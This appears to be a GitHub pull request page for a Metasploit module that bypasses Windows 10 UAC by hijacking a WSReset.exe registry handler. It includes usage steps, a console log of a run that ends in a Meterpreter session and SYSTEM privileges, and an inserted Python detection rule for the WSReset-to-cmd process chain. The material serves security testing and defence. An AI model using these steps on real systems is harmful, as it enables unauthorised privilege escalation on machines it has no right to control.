
WSReset.exe UAC bypass Take 2 #12280

Merged
merged 8 commits into from Sep 5, 2019

Conversation

@bwatters-r7
Contributor

commented Sep 5, 2019

This is a bit of a long story. I was testing and preparing to land another PR: #12226

When it did not work, I looked up "WSReset.exe bypass method" on Google and I realized that the PR was missing crucial steps, so I tried to add them. In the end, I rewrote most of the module, and it worked. Then I realized that there were two ways to bypass UAC using the WSReset.exe file, and I had simply found the wrong one. The original PR used the other way. These methods are fairly different, and share little code, so we decided to split them into two modules.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Get a session on a Windows 10 1803 or 1809 machine (I only tested x64)
  • use exploit/windows/local/bypassuac_windows_store_reg
  • set session X
  • run
  • verify you get a session
  • run getsystem
  • verify you are system

Running this on non-vulnerable machines appears to result in a shell that cannot be upgraded. Windows Defender has signatures for this attack, but this was not deemed as a vulnerability by MSRT, so 🤷‍♂️

timwr and others added 8 commits Aug 24, 2019

@bwatters-r7 bwatters-r7 changed the title Update 12226 WSReset.exe UAC bypass Take 2 Sep 5, 2019

@timwr timwr self-assigned this Sep 5, 2019

timwr added a commit that referenced this pull request Sep 5, 2019

@timwr timwr merged commit 20216ac into rapid7:master Sep 5, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed
@timwr

Contributor

commented Sep 5, 2019

Works great! Much better now that there is no extra Windows folder left behind.

msf5 exploit(windows/local/bypassuac_windows_store_reg) > run

[*] Started reverse TCP handler
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\WINDOWS
[*] tmp_dir = C:\Users\User\AppData\Local\Temp
[*] exploit_dir = C:\WINDOWS\System32\
[*] exploit_file = C:\WINDOWS\System32\WSReset.exe
[*] payload_pathname = C:\Users\User\AppData\Local\Temp\cZJxMSPHzE.exe
[*] Making Payload
[*] reg_command = C:\WINDOWS\System32\cmd.exe /c start C:\Users\User\AppData\Local\Temp\cZJxMSPHzE.exe
[*] Making Registry Changes
[*] Registry Changes Complete
[*] Uploading Payload to C:\Users\User\AppData\Local\Temp\cZJxMSPHzE.exe
[*] Payload Upload Complete
[*] Launching C:\WINDOWS\System32\WSReset.exe
[!] This exploit requires manual cleanup of 'C:\Users\User\AppData\Local\Temp\cZJxMSPHzE.exe!
[*] Sending stage (206403 bytes)
[*] Meterpreter session 2 opened
[*] Removing Registry Changes
[*] Registry Changes Removed

meterpreter >
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > exit
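The session output above shows the process chain a defender can key on: the auto-elevated WSReset.exe launching cmd.exe with `/c start` of an executable in the user's `AppData\Local\Temp`. The following is an added detection example, not code from this PR or from the Metasploit project. It parses constructed process-creation events (flattened Sysmon-style `key=value` lines, which are made up for this example) and flags any child of WSReset.exe at High integrity that is a command interpreter or that references a user Temp path; the sample lines, the field names and the interpreter list are assumptions for illustration.

```python
"""Flag process-creation events where the auto-elevated WSReset.exe spawns a
command interpreter or anything referencing a user-writable Temp directory."""
import ntpath
import re
from typing import Dict, List

# Constructed sample telemetry in a flattened key=value form, modelled on
# Sysmon process-creation fields. These lines are made up for this example;
# the WSReset.exe -> cmd.exe -> Temp payload chain mirrors the reg_command
# and payload_pathname values printed by the module above.
SAMPLE_EVENTS = [
    r"ParentImage=C:\Windows\explorer.exe Image=C:\WINDOWS\System32\WSReset.exe IntegrityLevel=High CommandLine=WSReset.exe",
    r"ParentImage=C:\WINDOWS\System32\WSReset.exe Image=C:\WINDOWS\System32\cmd.exe IntegrityLevel=High CommandLine=C:\WINDOWS\System32\cmd.exe /c start C:\Users\User\AppData\Local\Temp\cZJxMSPHzE.exe",
    r"ParentImage=C:\WINDOWS\System32\cmd.exe Image=C:\Users\User\AppData\Local\Temp\cZJxMSPHzE.exe IntegrityLevel=High CommandLine=C:\Users\User\AppData\Local\Temp\cZJxMSPHzE.exe",
    r"ParentImage=C:\Windows\explorer.exe Image=C:\WINDOWS\System32\notepad.exe IntegrityLevel=Medium CommandLine=notepad.exe",
]

# A new field starts only at whitespace followed by "Name="; this lets values
# such as CommandLine contain spaces without being split.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")

# Children that WSReset.exe has no business spawning in normal use (assumed
# list; tune against your own baseline).
INTERPRETERS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
    "cscript.exe", "mshta.exe", "rundll32.exe",
}
# Matches C:\Users\<name>\AppData\Local\Temp\ anywhere in a command line.
USER_TEMP_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.IGNORECASE)
# The bypass only matters when the child inherits an elevated token.
ELEVATED = {"High", "System"}


def parse_event(line: str) -> Dict[str, str]:
    """Parse one flattened key=value line into a dict of field -> value."""
    return {key: value for key, value in FIELD_RE.findall(line)}


def is_wsreset_abuse(ev: Dict[str, str]) -> bool:
    """True when an elevated WSReset.exe spawns an interpreter or a process
    whose command line points into a user Temp directory."""
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    if parent != "wsreset.exe":
        return False
    if ev.get("IntegrityLevel", "") not in ELEVATED:
        return False
    child = ntpath.basename(ev.get("Image", "")).lower()
    cmdline = ev.get("CommandLine", "")
    return child in INTERPRETERS or bool(USER_TEMP_RE.search(cmdline))


def detect(lines: List[str]) -> List[Dict[str, str]]:
    """Run the rule over a batch of event lines and return the findings."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if is_wsreset_abuse(ev):
            findings.append({
                "child": ev.get("Image", ""),
                "command_line": ev.get("CommandLine", ""),
                "integrity": ev.get("IntegrityLevel", ""),
            })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[!] WSReset.exe spawned {f['child']} at {f['integrity']} "
              f"integrity: {f['command_line']}")
```

Only the second sample line is flagged: the payload itself is a child of cmd.exe, not of WSReset.exe, so a rule keyed purely on "binary in Temp" would catch it for a different reason, while the parent/child pairing here is what ties it to this specific auto-elevation path. The registry changes the module makes and then removes are short-lived, so process telemetry is the more durable artefact; if registry auditing is available, the same window (between "Making Registry Changes" and "Registry Changes Removed") is where the per-user handler key is written.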
msjenkins-r7 added a commit that referenced this pull request Sep 5, 2019
@bwatters-r7

Contributor Author

commented Sep 5, 2019

Release Notes

This module uses a registry hijack that exists in WSReset.exe on some Windows 10 releases that allows execution of an arbitrary exe file with elevated privileges.
